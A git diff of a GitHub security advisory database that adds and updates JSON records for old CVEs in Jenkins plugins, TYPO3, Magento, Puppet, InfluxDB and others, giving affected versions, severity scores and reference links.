"type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.0.0" }, { "fixed": "2.0.1" @@ -60,6 +98,18 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89614" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/neos/flow/CVE-2013-7082.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/flow/CVE-2013-7082.yaml" + }, + { + "type": "WEB", + "url": "https://www.neos.io/blog/flow-sa-2013-001.html" + }, { "type": "WEB", "url": "http://osvdb.org/100825" diff --git a/advisories/github-reviewed/2022/05/GHSA-vccp-5v5h-p8m6/GHSA-vccp-5v5h-p8m6.json b/advisories/github-reviewed/2022/05/GHSA-vccp-5v5h-p8m6/GHSA-vccp-5v5h-p8m6.json index 1c31f298c3d96..e1166cfea6207 100644 --- a/advisories/github-reviewed/2022/05/GHSA-vccp-5v5h-p8m6/GHSA-vccp-5v5h-p8m6.json +++ b/advisories/github-reviewed/2022/05/GHSA-vccp-5v5h-p8m6/GHSA-vccp-5v5h-p8m6.json @@ -29,10 +29,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 6.2.2" - } + ] } ], "references": [ @@ -40,6 +37,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3946" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2014-3946.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-001/" + }, { "type": "WEB", "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-001/" diff --git a/advisories/github-reviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json b/advisories/github-reviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json new file mode 100644 index 0000000000000..f40872dc32dcd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vcgj-j8c5-2h52", + "modified": "2024-01-30T22:46:41Z", + "published": "2022-05-13T01:36:52Z", + "aliases": [ + "CVE-2017-2649" + ], + "summary": "Jenkins Active Directory Plugin did not verify certificate of AD server", + "details": "It was found that the Active Directory Plugin for Jenkins up to and including version 2.2 did not verify certificates of the Active Directory server, thereby enabling Man-in-the-Middle attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:active-directory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2649" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/96986" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:46:41Z", + "nvd_published_at": "2018-07-27T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json b/advisories/github-reviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json new file mode 100644 index 0000000000000..8343577d9bcf1 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf2c-w49g-3xf3", + "modified": "2024-01-30T23:19:08Z", + "published": "2022-05-24T16:52:46Z", + "aliases": [ + "CVE-2019-10387" + ], + "summary": "Missing permission check in Jenkins XL TestView Plugin", + "details": "A missing permission check in Jenkins XL TestView Plugin 1.2.0 and earlier in XLTestView.XLTestDescriptor#doTestConnection allows users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.xebialabs.xlt.ci:xltestview-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10387" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1008" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:19:08Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json b/advisories/github-reviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json new file mode 100644 index 0000000000000..60a47ba037c84 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vhh3-mvc4-hhq6", + "modified": "2024-01-30T22:03:41Z", + "published": "2022-05-13T01:18:20Z", + "aliases": [ + "CVE-2017-1000388" + ], + "summary": "Jenkins Dependency Graph Viewer plugin vulnerable to missing permission checks", + "details": "Jenkins Dependency Graph Viewer plugin 0.12 and earlier did not perform permission checks for the API endpoint that modifies the dependency graph, allowing anyone with Overall/Read permission to modify this data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:depgraph-view" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.13" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.12" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000388" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-10-23/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:03:41Z", + "nvd_published_at": "2018-01-26T02:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-vpg9-gq7j-mxqg/GHSA-vpg9-gq7j-mxqg.json b/advisories/github-reviewed/2022/05/GHSA-vpg9-gq7j-mxqg/GHSA-vpg9-gq7j-mxqg.json index ae3ce22e65667..6a6d18e2168ff 100644 --- a/advisories/github-reviewed/2022/05/GHSA-vpg9-gq7j-mxqg/GHSA-vpg9-gq7j-mxqg.json +++ b/advisories/github-reviewed/2022/05/GHSA-vpg9-gq7j-mxqg/GHSA-vpg9-gq7j-mxqg.json @@ -40,10 +40,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8144" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8144.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json b/advisories/github-reviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json new file mode 100644 index 0000000000000..e321171637419 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json @@ -0,0 +1,117 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrh7-99jh-3fmm", + "modified": "2024-02-06T22:38:26Z", + "published": "2022-05-02T06:10:33Z", + "aliases": [ + "CVE-2010-0156" + ], + "summary": "Puppet arbitrary files overwrite via a symlink attack", + "details": "Puppet 0.24.x before 0.24.9 and 0.25.x before 0.25.2 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/daemonout, (2) /tmp/puppetdoc.txt, (3) /tmp/puppetdoc.tex, or (4) /tmp/puppetdoc.aux temporary file.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "puppet" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.24.0" + }, + { + "fixed": "0.24.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "RubyGems", + "name": "puppet" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.25.0" + }, + { + "fixed": "0.25.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-0156" + }, + { + "type": "WEB", + "url": "https://github.com/puppetlabs/puppet/commit/0aae57f91dc69b22fb674f8de3a13c22edd07128" + }, + { + "type": "WEB", + "url": "https://github.com/puppetlabs/puppet/commit/6111ba80f2c6f6d1541af971f565119e6e03d77d" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=502881" + }, + { + "type": "PACKAGE", + "url": "https://github.com/puppetlabs/puppet" + }, + { + "type": "WEB", + "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2010-0156.yml" + }, + { + "type": "WEB", + "url": "https://puppet.com/security/cve/cve-2010-0156" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100316113904/http://secunia.com/advisories/38766" + }, + { + "type": "WEB", + "url": "http://groups.google.com/group/puppet-announce/browse_thread/thread/4401823f6cbf6087" + }, + { + "type": "WEB", + "url": "http://groups.google.com/group/puppet-announce/browse_thread/thread/73cd1b2896d986c2" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036083.html" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036166.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T22:38:26Z", + "nvd_published_at": "2010-03-03T19:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json b/advisories/github-reviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json new file mode 100644 index 0000000000000..6238a75790302 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vv4q-2w98-4v8g", + "modified": "2024-01-30T21:18:34Z", + "published": "2022-05-24T22:00:44Z", + "aliases": [ + "CVE-2019-10427" + ], + "summary": "Jenkins Aqua MicroScanner Plugin showed plain text credential in configuration form ", + "details": "Jenkins Aqua MicroScanner Plugin 1.0.7 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aqua-microscanner" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.7" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10427" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1507" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:18:34Z", + "nvd_published_at": "2019-09-25T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-vx7m-v8v2-fhwm/GHSA-vx7m-v8v2-fhwm.json b/advisories/github-reviewed/2022/05/GHSA-vx7m-v8v2-fhwm/GHSA-vx7m-v8v2-fhwm.json index 7d0f04b0d98ee..325087eba45eb 100644 --- a/advisories/github-reviewed/2022/05/GHSA-vx7m-v8v2-fhwm/GHSA-vx7m-v8v2-fhwm.json +++ b/advisories/github-reviewed/2022/05/GHSA-vx7m-v8v2-fhwm/GHSA-vx7m-v8v2-fhwm.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8131" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8131.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-w2xx-jp9f-gp8g/GHSA-w2xx-jp9f-gp8g.json b/advisories/github-reviewed/2022/05/GHSA-w2xx-jp9f-gp8g/GHSA-w2xx-jp9f-gp8g.json index cfdf7b044a2e3..8d1af92b210fc 100644 --- a/advisories/github-reviewed/2022/05/GHSA-w2xx-jp9f-gp8g/GHSA-w2xx-jp9f-gp8g.json +++ b/advisories/github-reviewed/2022/05/GHSA-w2xx-jp9f-gp8g/GHSA-w2xx-jp9f-gp8g.json @@ -37,6 +37,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3397" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2015-3397.yaml" + }, { "type": "WEB", "url": "https://github.com/yiisoft/yii2/blob/2.0.4/framework/CHANGELOG.md" @@ -45,6 +49,14 @@ "type": "WEB", "url": "https://web.archive.org/web/20210122155403/http://www.securityfocus.com/bid/74663" }, + { + "type": "WEB", + "url": "https://www.yiiframework.com/news/86/yii-2-0-4-is-released/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/74663" + }, { "type": "WEB", "url": "http://www.yiiframework.com/news/86/yii-2-0-4-is-released/" diff --git a/advisories/github-reviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json b/advisories/github-reviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json new file mode 100644 index 0000000000000..7b202bf451b34 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w327-wq28-3vmf", + "modified": "2024-02-08T22:07:12Z", + "published": "2022-05-02T03:56:59Z", + "aliases": [ + "CVE-2009-4665" + ], + "summary": "CuteSoft CuteEditor Path Traversal vulnerability", + "details": "Directory traversal vulnerability in `CuteSoft_Client/CuteEditor/Load.ashx` in CuteSoft Components Cute Editor for ASP.NET allows remote attackers to read arbitrary files via a `..` (dot dot) in the file parameter.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "CuteEditor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-4665" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/50727" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228205122/http://www.securityfocus.com/bid/35085" + }, + { + "type": "WEB", + "url": "http://www.exploit-db.com/exploits/8785" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T22:07:12Z", + "nvd_published_at": "2010-03-05T18:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json b/advisories/github-reviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json new file mode 100644 index 0000000000000..1966a8d91fafe --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w55x-q3gv-px85", + "modified": "2024-02-01T21:15:36Z", + "published": "2022-05-24T22:01:18Z", + "aliases": [ + "CVE-2018-17572" + ], + "summary": "InfluxDB Reflected Cross-site Scripting ", + "details": "InfluxDB 0.9.5 has Reflected XSS in the admin panel via the Write Data module.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/influxdata/influxdb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.9.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.9.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17572" + }, + { + "type": "WEB", + "url": "https://github.com/influxdata/influxdb/issues/21444#issuecomment-837442467" + }, + { + "type": "WEB", + "url": "https://github.com/influxdata/influxdb/releases/tag/v0.9.6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:15:36Z", + "nvd_published_at": "2020-03-02T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json b/advisories/github-reviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json new file mode 100644 index 0000000000000..cb5cf245a3e15 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json @@ -0,0 +1,124 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w736-qv86-vq94", + "modified": "2024-02-07T23:57:37Z", + "published": "2022-05-17T05:28:57Z", + "aliases": [ + "CVE-2010-3714" + ], + "summary": "TYPO3 Remote File Disclosure vulnerability in the jumpUrl mechanism", + "details": "The jumpUrl (aka access tracking) implementation in `tslib/class.tslib_fe.php` in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 does not properly compare certain hash values during access-control decisions, which allows remote attackers to read arbitrary files via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3714" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/687b671c765eac10ffb764547bb403ac3ef55620" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/a8ccd387cafd2c2c338fc29109c16418f7657229" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/d95f06f633fd2c289b544f6d5907b789eae6cccb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3/typo3" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111220151231/http://www.securityfocus.com/bid/43786" + }, + { + "type": "WEB", + "url": "http://blog.nibblesec.org/2010/12/typo3-sa-2010-020-typo3-sa-2010-022.html" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2121" + }, + { + "type": "WEB", + "url": "http://www.exploit-db.com/exploits/15856" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:57:37Z", + "nvd_published_at": "2010-10-25T20:01:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json b/advisories/github-reviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json new file mode 100644 index 0000000000000..887b6411f2742 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wg7x-vf54-9qjw", + "modified": "2024-01-30T22:12:51Z", + "published": "2022-05-13T01:25:43Z", + "aliases": [ + "CVE-2019-1003058" + ], + "summary": "CSRF vulnerability in Jenkins FTP publisher Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins FTP publisher Plugin in the FTPPublisher.DescriptorImpl#doLoginCheck method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:ftppublisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003058" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-974" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:12:51Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json b/advisories/github-reviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json new file mode 100644 index 0000000000000..4561cb1303cc5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whcg-2364-672f", + "modified": "2024-01-30T21:54:25Z", + "published": "2022-05-13T01:15:02Z", + "aliases": [ + "CVE-2019-10290" + ], + "summary": "Missing permission check in Jenkins Netsparker Cloud Scan Plugin", + "details": "A missing permission check in Jenkins Netsparker Cloud Scan Plugin 1.1.5 and older in the NCScanBuilder.DescriptorImpl#doValidateAPI form validation method allowed attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:netsparker-cloud-scan" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10290" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1032" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:54:25Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json b/advisories/github-reviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json new file mode 100644 index 0000000000000..4f9546f291bd0 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmq3-24jm-m8xh", + "modified": "2024-01-30T21:09:04Z", + "published": "2022-05-13T01:15:01Z", + "aliases": [ + "CVE-2019-10280" + ], + "summary": "Jenkins Assembla Auth Plugin stores credentials in plain text ", + "details": "Jenkins Assembla Auth Plugin stores credentials unencrypted in the global config.xml configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:assembla-auth" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.13" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.11" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10280" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1093" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:09:04Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json b/advisories/github-reviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json new file mode 100644 index 0000000000000..ff1500b3658e3 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wp79-cpv2-9g7m", + "modified": "2024-01-30T22:38:21Z", + "published": "2022-05-14T03:45:21Z", + "aliases": [ + "CVE-2017-1000502" + ], + "summary": "Arbitrary shell command execution in Jenkins EC2 Plugin", + "details": "Users with permission to create or configure agents in Jenkins 1.37 and earlier could configure an EC2 agent to run arbitrary shell commands on the master node whenever the agent was supposed to be launched. Configuration of these agents now requires the 'Run Scripts' permission typically only granted to administrators.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:ec2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.38" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.37" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000502" + }, + { + "type": "WEB", + "url": 